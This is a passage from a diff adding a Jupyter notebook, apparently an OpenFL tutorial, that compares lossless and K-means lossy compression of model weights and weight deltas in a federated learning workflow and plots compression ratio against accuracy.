backward(self,compressed_weight_dict, weight_dict_metadata):\n", + " kcpipeline = KCPipeline(n_clusters=self.n_clusters)\n", + " lossless_transformer = GZIPTransformer()\n", + " weight_dict = {}\n", + " for key in compressed_weight_dict.keys():\n", + " weight_dict[key] = kcpipeline.backward(compressed_weight_dict[key], weight_dict_metadata[key])\n", + " return weight_dict\n", + "\n", + "import numpy as np\n", + "x = {'a': np.array([1,2,3,4,5]), 'b': np.array([[123,234],[234,345]])}\n", + "print(f'x = {x}')\n", + "compressed_dict, metadata, _ = LosslessCompression.forward(x)\n", + "print(f'compressed array = {compressed_dict}, metadata = {metadata}')\n", + "uncompressed_dict = LosslessCompression.backward(compressed_dict, metadata)\n", + "print(f'uncompressed = {uncompressed_dict}')\n", + "\n", + "compressed_dict, metadata, _ = LossyCompression(n_clusters=10).forward(x)\n", + "print(f'compressed array = {compressed_dict}, metadata = {metadata}')\n", + "uncompressed_dict = LossyCompression().backward(compressed_dict, metadata)\n", + "print(f'uncompressed = {uncompressed_dict}')" + ], + "metadata": { + "id": "h_8P8jRwxMSQ" + }, + "id": "h_8P8jRwxMSQ", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Now let's apply lossless compression to the workflow" + ], + "metadata": { + "id": "EbLOy4sZ_epb" + }, + "id": "EbLOy4sZ_epb" + }, + { + "cell_type": "code", + "source": [ + "from openfl.experimental.workflow.placement import aggregator, collaborator\n", + "\n", + "class CompressionFlow(FLSpec):\n", + "\n", + " def __init__(self, model=None, optimizer=None, rounds=3, compression=LosslessCompression(), **kwargs):\n", + " super().__init__(**kwargs)\n", + " self.compression = compression\n", + " if model is not None:\n", + " self.model = model\n", + " print(f'setting self.model to {model}')\n", + " self.optimizer = optimizer\n", + " else:\n", + " self.model = Net()\n", + " self.optimizer = optim.SGD(self.model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " self.rounds = rounds\n", + "\n", + " @aggregator\n", + " def start(self):\n", + " print(f'Performing initialization for model')\n", + " self.collaborators = self.runtime.collaborators\n", + " self.current_round = 0\n", + " ################################\n", + " self.compression_ratio = []\n", + " model_weights = get_weights(self.model)\n", + " self.compressed_model_weights, self.compressed_model_metadata, _ = self.compression.forward(model_weights)\n", + " ################################\n", + " self.next(self.aggregated_model_validation, foreach='collaborators')\n", + "\n", + " @collaborator\n", + " def aggregated_model_validation(self):\n", + " model_weights = self.compression.backward(self.compressed_model_weights, self.compressed_model_metadata)\n", + " self.model = set_weights(self.model,model_weights)\n", + " print(f'Performing aggregated model validation for collaborator {self.input}')\n", + " self.agg_validation_score = inference(self.model, self.test_loader)\n", + " print(f'{self.input} value of {self.agg_validation_score}')\n", + " self.next(self.train)\n", + "\n", + " def train_func(self):\n", + " train_losses = []\n", + " for batch_idx, (data, target) in enumerate(self.train_loader):\n", + " self.optimizer.zero_grad()\n", + " output = self.model(data)\n", + " loss = F.nll_loss(output, target)\n", + " loss.backward()\n", + " self.optimizer.step()\n", + " if batch_idx % log_interval == 0:\n", + " print('Train Epoch: 1 [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n", + " batch_idx * len(data), len(self.train_loader.dataset),\n", + " 100. * batch_idx / len(self.train_loader), loss.item()))\n", + " self.loss = loss.item()\n", + "\n", + " @collaborator\n", + " def train(self):\n", + " self.model.train()\n", + " self.optimizer = optim.SGD(self.model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " self.train_func()\n", + " self.next(self.local_model_validation)\n", + "\n", + " @collaborator\n", + " def local_model_validation(self):\n", + " self.local_validation_score = inference(self.model, self.test_loader)\n", + " print(\n", + " f'Doing local model validation for collaborator {self.input}: {self.local_validation_score}')\n", + " model_weights = get_weights(self.model)\n", + " #*********************************\n", + " self.compressed_model_weights, self.compressed_model_metadata, relative_size = self.compression.forward(model_weights)\n", + " self.compression_ratio.append(1.0/relative_size)\n", + " #This will result in only the *compressed model weights* being sent\n", + " self.next(self.join)\n", + "\n", + " @aggregator\n", + " def join(self, inputs):\n", + " self.average_loss = sum(input.loss for input in inputs) / len(inputs)\n", + " self.aggregated_model_accuracy = sum(\n", + " input.agg_validation_score for input in inputs) / len(inputs)\n", + " self.local_model_accuracy = sum(\n", + " input.local_validation_score for input in inputs) / len(inputs)\n", + " print(f'Average aggregated model validation values = {self.aggregated_model_accuracy}')\n", + " print(f'Average training loss = {self.average_loss}')\n", + " print(f'Average local model validation values = {self.local_model_accuracy}')\n", + " model_weight_list = [self.compression.backward(input.compressed_model_weights,input.compressed_model_metadata) for input in inputs]\n", + " model_weights = WeightsOnlyFedAvg(model_weight_list)\n", + " self.optimizer = [input.optimizer for input in inputs][0]\n", + " # Add the compression ratios from each of the collaborators\n", + " self.compression_ratio += [input.compression_ratio[-1] for input in inputs]\n", + " self.current_round += 1\n", + " if self.current_round < self.rounds:\n", + " self.compressed_model_weights, self.compressed_model_metadata, relative_size = LosslessCompression.forward(model_weights)\n", + " self.compression_ratio.append(1.0/relative_size)\n", + " self.next(self.aggregated_model_validation,\n", + " foreach='collaborators')\n", + " else:\n", + " self.next(self.end)\n", + "\n", + " @aggregator\n", + " def end(self):\n", + " print(f'This is the end of the flow')" + ], + "metadata": { + "id": "1MHjm_BCCGTw" + }, + "execution_count": null, + "outputs": [], + "id": "1MHjm_BCCGTw" + }, + { + "cell_type": "markdown", + "source": [ + "Now let's try running the flow with compressed model weights and see the improvement." + ], + "metadata": { + "id": "WFYCCy0YCrrB" + }, + "id": "WFYCCy0YCrrB" + }, + { + "cell_type": "code", + "source": [ + "flflow4 = CompressionFlow(model=Net(), rounds=2)\n", + "flflow4.runtime = updated_local_runtime\n", + "flflow4.run()" + ], + "metadata": { + "id": "sRzPfMiwCzd0" + }, + "id": "sRzPfMiwCzd0", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Using lossless compression helped minimally, with the compressed model weights taking **~93% memory** vs the original model tensors (a savings of 7%).\n", + "\n", + "This can be explained because we are preserving all of the original information - and these model weights do not exhibit much sparsity in their current form. If instead we send only the differences between the model of the prior round and the current, that sparsity should increase as the model starts to converge. Let's explore that:" + ], + "metadata": { + "id": "50FarAt9KA4u" + }, + "id": "50FarAt9KA4u" + }, + { + "cell_type": "code", + "source": [ + "class WeightsDict(dict):\n", + " \"\"\"\n", + " Convenience type to demonstrate model weight manipulation cleanly\n", + " \"\"\"\n", + " def __add__(self, second_dict):\n", + " for key in second_dict.keys():\n", + " self[key] += second_dict[key]\n", + " return WeightsDict(self)\n", + "\n", + " def __sub__(self, second_dict):\n", + " for key in second_dict.keys():\n", + " self[key] -= second_dict[key]\n", + " return WeightsDict(self)\n", + "\n", + "x = {'a':5, 'b':7}\n", + "y = {'a':2, 'b':10}\n", + "\n", + "print(f'new weight dict = {WeightsDict(x) + WeightsDict(y)}')\n", + "print(f'subtraction dict = {WeightsDict(x) - WeightsDict(y)}')" + ], + "metadata": { + "id": "gSx4_mq9LQKH" + }, + "id": "gSx4_mq9LQKH", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "from openfl.experimental.workflow.placement import aggregator, collaborator\n", + "\n", + "class DeltaCompressionFlow(CompressionFlow):\n", + "\n", + " @aggregator\n", + " def start(self):\n", + " print(f'Performing initialization for model')\n", + " self.collaborators = self.runtime.collaborators\n", + " self.current_round = 0\n", + " self.compression_ratio = []\n", + " model_weights = get_weights(self.model)\n", + " self.compressed_model_weights, self.compressed_model_metadata, _ = self.compression.forward(model_weights)\n", + " self.next(self.aggregated_model_validation, foreach='collaborators')\n", + "\n", + " @collaborator\n", + " def aggregated_model_validation(self):\n", + " model_weights = self.compression.backward(self.compressed_model_weights, self.compressed_model_metadata)\n", + " if self.current_round == 0: # Check if prior weights are initialized\n", + " self._prior_model_weights = WeightsDict(model_weights)\n", + " else:\n", + " model_weights = deepcopy(self._prior_model_weights) + WeightsDict(deepcopy(model_weights))\n", + " self._prior_model_weights = model_weights\n", + " self.model = set_weights(self.model,model_weights)\n", + " print(f'Performing aggregated model validation for collaborator {self.input}')\n", + " self.agg_validation_score = inference(self.model, self.test_loader)\n", + " print(f'{self.input} value of {self.agg_validation_score}')\n", + " self.next(self.train)\n", + "\n", + " def train_func(self):\n", + " train_losses = []\n", + " for batch_idx, (data, target) in enumerate(self.train_loader):\n", + " self.optimizer.zero_grad()\n", + " output = self.model(data)\n", + " loss = F.nll_loss(output, target)\n", + " loss.backward()\n", + " self.optimizer.step()\n", + " if batch_idx % log_interval == 0:\n", + " print('Train Epoch: 1 [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n", + " batch_idx * len(data), len(self.train_loader.dataset),\n", + " 100. * batch_idx / len(self.train_loader), loss.item()))\n", + " self.loss = loss.item()\n", + "\n", + " @collaborator\n", + " def train(self):\n", + " self.model.train()\n", + " self.optimizer = optim.SGD(self.model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " self.train_func()\n", + " self.next(self.local_model_validation)\n", + "\n", + " @collaborator\n", + " def local_model_validation(self):\n", + " self.local_validation_score = inference(self.model, self.test_loader)\n", + " print(\n", + " f'Doing local model validation for collaborator {self.input}: {self.local_validation_score}')\n", + " model_weights = get_weights(self.model)\n", + " #*********************************\n", + " weights_delta = WeightsDict(model_weights) - self._prior_model_weights\n", + " self.compressed_model_weights, self.compressed_model_metadata, relative_size = self.compression.forward(weights_delta)\n", + " self.compression_ratio.append(1.0/relative_size)\n", + " self.next(self.join)\n", + "\n", + " @aggregator\n", + " def join(self, inputs):\n", + " self.average_loss = sum(input.loss for input in inputs) / len(inputs)\n", + " self.aggregated_model_accuracy = sum(\n", + " input.agg_validation_score for input in inputs) / len(inputs)\n", + " self.local_model_accuracy = sum(\n", + " input.local_validation_score for input in inputs) / len(inputs)\n", + " print(f'Average aggregated model validation values = {self.aggregated_model_accuracy}')\n", + " print(f'Average training loss = {self.average_loss}')\n", + " print(f'Average local model validation values = {self.local_model_accuracy}')\n", + " weights_delta_list = [self.compression.backward(input.compressed_model_weights,input.compressed_model_metadata) for input in inputs]\n", + " #TODO update self.model for every round\n", + " model_weight_list = [WeightsDict(get_weights(self.model)) + delta for delta in weights_delta_list]\n", + " model_weights = WeightsOnlyFedAvg(model_weight_list)\n", + " self.model = set_weights(self.model,deepcopy(model_weights))\n", + " self.optimizer = [input.optimizer for input in inputs][0]\n", + " self.current_round += 1\n", + " # Add the compression ratios from each of the collaborators\n", + " self.compression_ratio += [input.compression_ratio[-1] for input in inputs]\n", + " if self.current_round < self.rounds:\n", + " self.compressed_model_weights, self.compressed_model_metadata, relative_size = self.compression.forward(model_weights)\n", + " self.compression_ratio.append(1.0/relative_size)\n", + " self.next(self.aggregated_model_validation,\n", + " foreach='collaborators')\n", + " else:\n", + " self.next(self.end)\n", + "\n", + " @aggregator\n", + " def end(self):\n", + " print(f'This is the end of the flow')" + ], + "metadata": { + "id": "Hs7qxwSVOBWx" + }, + "id": "Hs7qxwSVOBWx", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Now let's see how much compression has improved" + ], + "metadata": { + "id": "tjmhX5XlStGx" + }, + "id": "tjmhX5XlStGx" + }, + { + "cell_type": "code", + "source": [ + "flflow5 = DeltaCompressionFlow(model=Net(), rounds=2)\n", + "flflow5.runtime = updated_local_runtime\n", + "flflow5.run()" + ], + "metadata": { + "id": "auA_zvZ1SkK2" + }, + "id": "auA_zvZ1SkK2", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Now lossless compression on the deltas has marginally improved to ~92% of the original model. The reason for this is that the delta is producing many values that are close to, but not exactly 0. This results in many lost opportunity to compress the tensors significantly; case in point:" + ], + "metadata": { + "id": "KJMqxxcWW249" + }, + "id": "KJMqxxcWW249" + }, + { + "cell_type": "code", + "source": [ + "flflow6 = DeltaCompressionFlow(model=Net(), rounds=2, compression=LossyCompression())\n", + "flflow6.runtime = updated_local_runtime\n", + "flflow6.run()" + ], + "metadata": { + "id": "CQ8JOnATXUwy" + }, + "id": "CQ8JOnATXUwy", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Now we are getting somewhere! By using Lossy Compression (applying K-Means to each layer tensor, followed by GZIP compression) the resulting tensors take up **13% of their original memory, but with negative impact on final training accuracy**. There is a trade off to observe here; as compression goes up, accuracy generally goes down. There can be a significant positive effect on the efficient scaling of real world federations, and allows for better performance with largers models or more collaborators, but it's important to find the right compression parameters first.\n", + "\n", + "Let's use the output of each of the flows to compare the average compression ratio (inverse of reported relative weight) vs. the final accuracy." + ], + "metadata": { + "id": "4-savWezRX5H" + }, + "id": "4-savWezRX5H" + }, + { + "cell_type": "code", + "source": [ + "import matplotlib.pyplot as plt\n", + "\n", + "x1 = np.average(flflow4.compression_ratio)\n", + "y1 = flflow4.aggregated_model_accuracy\n", + "x2 = np.average(flflow5.compression_ratio)\n", + "y2 = flflow5.aggregated_model_accuracy\n", + "x3 = np.average(flflow6.compression_ratio)\n", + "y3 = flflow6.aggregated_model_accuracy\n", + "\n", + "plt.scatter(1,centralized_accuracy,c='black',label='Centralized',alpha=0.5)\n", + "plt.scatter(x1,y1,c='blue',label='Lossless Compression',alpha=0.5)\n", + "plt.scatter(x2,y2,c='red',label='Lossless Delta Compression',alpha=0.5)\n", + "plt.scatter(x3,y3,c='green',label='Lossy Delta Compression',alpha=0.5)\n", + "plt.xlabel('Average Compression Ratio')\n", + "plt.ylabel('Final Accuracy')\n", + "plt.legend()\n", + "plt.show()" + ], + "metadata": { + "id": "fAlWJUPzqV6l" + }, + "id": "fAlWJUPzqV6l", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Now let's see if we can tune the number of K-means clusters to achieve a better result. Increasing the number of clusters should intuitively improve accuracy (as we are able to incorporate additional information). Let's increase this to 50 clusters and see what happens." + ], + "metadata": { + "id": "qNFIFMjiQmWd" + }, + "id": "qNFIFMjiQmWd" + }, + { + "cell_type": "code", + "source": [ + "flflow7 = DeltaCompressionFlow(model=Net(), rounds=2, compression=LossyCompression(n_clusters=50))\n", + "flflow7.runtime = updated_local_runtime\n", + "flflow7.run()" + ], + "metadata": { + "id": "NlRmGVIaRA8D" + }, + "id": "NlRmGVIaRA8D", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "x4 = np.average(flflow7.compression_ratio)\n", + "y4 = flflow7.aggregated_model_accuracy\n", + "\n", + "plt.scatter(1,centralized_accuracy,c='black',label='Centralized',alpha=0.5)\n", + "plt.scatter(x1,y1,c='blue',label='Lossless Compression',alpha=0.5)\n", + "plt.scatter(x2,y2,c='red',label='Lossless Delta Compression',alpha=0.5)\n", + "plt.scatter(x3,y3,c='green',label='Lossy Delta Compression',alpha=0.5)\n", + "plt.xlabel('Average Compression Ratio')\n", + "plt.ylabel('Final Accuracy')\n", + "plt.scatter(x4,y4,c='purple',label='Lossy Delta Compression (50 K-means clusters)',alpha=0.5)\n", + "plt.legend()\n", + "plt.show()" + ], + "metadata": { + "id": "Ha9LH75oVKxL" + }, + "id": "Ha9LH75oVKxL", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Now that the number of clusters have increased, **the accuracy has increased to ~81%, while retaining a 4x reduction is memory footprint**. The accuracy is now roughly inline with the lossless compression applied to deltas!" + ], + "metadata": { + "id": "izrJuTMeWPSH" + }, + "id": "izrJuTMeWPSH" + }, + { + "cell_type": "markdown", + "id": "426f2395", + "metadata": { + "id": "426f2395" + }, + "source": [ + "# Next Steps\n", + "Now that you've gotten a peek into the practical considerations of federated learning framework internals. In subsequent posts, we'll begin building higher level abstractions that make use of the low level functionality implemented as part of these workflows. We will also go through how to take security to the next level by adding checks into transfered data types, and finally how to deploy these pieces on real hardware. Stay tuned!" + ] + }, + { + "cell_type": "code", + "source": [], + "metadata": { + "id": "Ghh-dsltZmDN" + }, + "id": "Ghh-dsltZmDN", + "execution_count": null, + "outputs": [] + } + ], + "metadata": { + "kernelspec": { + "display_name": "Python 3", + "name": "python3" + }, + "language_info": { + "codemirror_mode": { + "name": "ipython", + "version": 3 + }, + "file_extension": ".py", + "mimetype": "text/x-python", + "name": "python", + "nbconvert_exporter": "python", + "pygments_lexer": "ipython3", + "version": "3.11.5" + }, + "colab": { + "provenance": [], + "private_outputs": true + } + }, + "nbformat": 4, + "nbformat_minor": 5 +} \ No newline at end of file